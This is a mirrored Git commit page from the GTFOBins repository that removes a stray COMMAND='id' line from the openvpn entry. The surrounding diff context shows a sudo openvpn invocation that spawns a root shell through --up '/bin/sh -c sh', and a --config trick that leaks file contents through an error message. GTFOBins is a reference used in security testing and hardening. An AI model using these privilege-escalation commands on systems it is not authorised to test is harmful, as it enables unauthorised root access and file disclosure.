mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Remove leftover line from openvpn
This commit is contained in:
parent
daf9b43e80
commit
7bf1608cd5
@ -14,7 +14,6 @@ functions:
|
|||||||
./openvpn --config "$LFILE"
|
./openvpn --config "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='id'
|
|
||||||
sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh'
|
sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh'
|
||||||
- description: The file is actually parsed and the first partial wrong line is returned in an error message.
|
- description: The file is actually parsed and the first partial wrong line is returned in an error message.
|
||||||
code: |
|
code: |
|
||||||
|
Loading…
Reference in New Issue
Block a user